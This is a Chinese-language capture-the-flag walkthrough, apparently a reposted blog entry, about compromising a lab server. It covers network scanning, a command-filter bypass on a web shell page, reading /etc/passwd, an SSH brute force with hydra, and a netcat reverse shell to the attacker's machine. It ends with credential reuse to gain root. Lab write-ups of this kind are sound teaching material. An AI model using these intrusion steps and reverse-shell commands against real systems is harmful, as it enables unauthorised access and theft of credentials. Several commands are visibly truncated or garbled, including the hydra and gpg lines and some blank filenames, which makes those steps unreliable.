nmap -A 10.9.136.0/24 -p 1-2000加了
-A参数扫描整个网段十分的慢,所以建议先不用-A扫描,速度能提升很多nmap 10.9.136.0/24 -p 1-2000扫描完成之后,如图所示,有一个非网关的主机,暴露了一个80端口
通过上面的网段扫描,我们发现有台主机暴露了80端口,开启了
http服务,所以准备开始对这台主机进行信息收集,先使用nmap对这个主机进行全面扫描,命令如下:nmap 10.9.136.6 -A -p- -oN这个命令的意思是对 指定
IP的主机进行所有端口号的扫描,并且把扫描结果输出到文件中。扫描结果如图所示,发现该主机修改了ssh端口为:25468
到此,主机的端口地址等基本信息就收集完毕了
由于发现该
IP(10.9.136.6)暴露了80端口,于是尝试访问一下该网站,看看能否发现有用的信息打开网站之后,经过查找,我们来到
Contact Us 超链接处,发现了可能有用的信息在这个页面中,有很多人的电话,邮箱,职位等信息,在继续仔细寻找,又发现了IT部门的人员信息:
由于网站一般都是由IT部门维护的,所以我猜测,这些人当中至少有一个人是负责网站维护的,于是把这些人的名字记录下来
Bob,Sebastian,Elliot,Jospeh接着我们继续寻找该网站的信息,发现没有什么信息可以利用的了,于是我有个想法:会不会有一些隐藏的路径没有在超链接中,一般情况下看不到呢?于是我打算使用网站扫描工具
niktonikto -h 10.9.136.6发现了三个隐藏路径
/dev_shell.php /lat_memo.html /passwords.html对这三个目录进行研究,发现只有目录
/dev_shell.php有个输入框,似乎有利用的可能:
进入该网站之后,输入 linux 命令,查看当前目录:
发现查看失败,我猜测可能直接过滤了我们的 ls指令,那就要考虑使用其他方式来触发该指令,比如使用绝对路径 /bin/ls:
发现当前目录文件已经显示出来了,通过绝对路径的方式成功绕过检测,那么我们要想渗透进目标服务器,首先想到的就是查看对应的包含用户信息的文件 /etc/passwd,依旧使用绝对路径绕过检测/bin/cat /etc/passwd:
我们可以看到 passwd文件的详细信息,但是页面上显示的信息有些乱,所以有个小技巧,可以通过 F12 查看源码,找到对应的内容部分,双击即可看到排列整齐的内容了,由于我们的普通用户ID是从1001开始的,所以我们可以找到用户id为1001的那列信息,可以看到该服务器有个用户名为 bob的普通用户。
看到了bob,是不是感觉有点眼熟?没错,这个用户名就是我们刚刚在网站上看到的信息,他是IT部门的一个人员,又出现在了 passwd文件中,因此大概可以确定,bob是这个网站的开发人员或者维护人员,所以我们如果能拿到 bob的密码,就能成功登录服务器,获取更多信息。想到密码,自然想到密码爆破了,因为根据我们前面收集的信息:IP,SSH端口,用户名,因此考虑使用九头蛇进行密码爆破:
hydra -l bob - -V -s 25468 ssh://10.9.136.6
但是,一般情况下服务器的密码不会是弱口令,所以如果没有强大的密码字典,是几乎没办法爆破出来了,纯靠运气,而且强大的密码字典太大了,可能爆破几天几夜也爆破不出来,所以这个密码爆破方案只能先这样放着,起个终端让他慢慢爆破,我们得开始考虑从其他地方入手了。
由于我们可以直接通过绝对路径绕过检测,进入直接操作 linux,所以我们可以考虑让该服务器主动连接我们的 kali,从而获取反弹shell。因此我们就要用到 名为瑞士军刀(nc)的工具了,先到我们的 kali开启监听:
nc -lvvp 8888
这个 nc命令表示开始监听 kali 的 8888 端口,在 kali开始监听8888端口之后,我们来到那个可以输入linux命令的网站,通过绝对路径的方式绕过检测,输入以下命令,连接我们的 kali
/bin/nc -e /bin/bash 10.9.136.152 8888
这个命令表示 连接IP 为 10.9.136.152,端口为8888的 kali,当我们输入这个命令后,如图所示,标签栏正在转圈,说明正在连接:
然后我们可以看到我们的 kali:
发现 kali监听到了有主机连接上了,然后我们可以直接输入命令 ls看看能否直接访问当前目录:
发现展示出了当前目录下的信息,但是看着有些奇怪,因为目前看来虽然能执行命令,但是和一般终端不一样,所以为了接下来更好操作,我们可以输入以下python命令(一般 linux都会安装python环境),获取一般终端的显示:
python -c "import pty;pty.spawn('/bin/bash')"
可以看到,我们获得了一般的终端显示,并且输入ls命令获取当前目录信息:
竟然我们要渗透对方服务器,肯定不能用普通的 ls了,我们需要找到更加全面的信息,使用 ls -a可以查看到是否有隐藏文件,一般隐藏文件都比较重要:
通过 ls -a命令,发现并没什么重要的隐藏文件,唯独发现了 passwords.html文件,通过 vi passwords.html命令查看内容,没有什么重要的信息,经过再三思考,我发现,我们通过反弹shell进入终端的目录就是当前网站所在目录,一般肯定是没有什么系统用户相关的信息的,这些信息一般放在 /home目录中,于是我们切换到 /home目录,然后查看当前目录下信息:
我们发现,在 /home目录中,有个目录是 bob,结合前面的信息收集,密码爆破,都涉及到了 bob,从而更加证明,从 bob这个用户入手肯定没有问题,于是我们进入bob目录,进入之后使用 ls -a查看所有文件信息,看看有没有其他有用的信息:
我们可以看到,有个带有 password字样的文件,于是我们进入看看:
可以发现,有个类似于用户名,密码的内容,根据前面信息收集到的ssh端口25468于是我尝试使用SSH登录,看看能否登录进去:
ssh jc@10.9.136.6 -p 25468
成功登录该用户,为了方便操作,因为反弹shell连接的目标服务器无法使用补全功能,所以我使用 FinalShell新开一个窗口,连接 jc用户进行操作。
进入该 jc用户的终端之后,开始查找目录,看看能不能找到有用的东西,找来找去,发现 jc用户还是找不到什么有用的信息,算了,我们还是继续回到我们的突破口 bob,通过 cd /home/bob进入 bob用户的目录,继续查找有用的信息,突然,进入 /home/bob/Documents目录下,发现了几个文件:
第一个文件是 gpg后缀,在百度中搜索一下这种文件是什么文件,发现 gpg结尾的文件是加密文件,有经验的渗透测试人员一眼就能看出这个文件是加密文件,所以自然联想到解密了,这种文件解密需要秘钥,所以我们尝试去找找秘钥吧,在这个目录中,我们还可以看到一个名为 Secret的目录,这个目录名就有意思了,翻译为秘密,那就要进去看看有什么秘密了,进入该文件后,经过层层文件的查看,发现了一个 notes.sh脚本,于是直接执行,结果如下:
发现输出了上面的内容,内容好像没什么重要信息,但是这个文件是放在名为Secret的目录中的,并且藏的很深,而且就这个简单的输出语句,却做了一个 sh脚本,那就肯定有重要信息隐藏在这了,我们可以看到,这个内容的每行开头都是大写,可能是藏头诗,我猜测,这个藏头诗的结果可能就是秘钥,所以我们先记录下这个秘钥:HARPOCRATES
然后回到 /home/bob/Documents目录,我们通过以下命令尝试使用秘钥破解这个 gpg文件:
gpg --batch --passphrase HARPOCRATES -pg
输入以上命令之后,可以看到,解密成功:
根据解密内容我们可以得知,bob的密码应该就是 b0bcat_了,于是我们通过ssh连接尝试能否成功登录:
ssh bob@10.9.136.6 -p 25468
可以看到,成功登录bob用户,进入bob用户之后,我们输入cd / 去他的根目录看看:
发现文件中有个文件叫做 <,我们只要获得文件里面的内容,就相当于打靶成功,于是输入 ,查看文件内容:
发现没有权限,所以我们要拿到root权限,既然那个网站的IT部门的人是bob,那么bob也可能是拥有最高权限的用户,所以我尝试一下使用bob的密码(b0bcat_)登录root账号试试:
su root
发现登录成功,输入命令 cd / 进入根目录,输入 查看 <:
夺旗成功 !
本文发布于:2024-02-02 06:36:46,感谢您对本站的认可!
本文链接:https://www.4u4v.net/it/170682700842025.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
| 留言与评论(共有 0 条评论) |
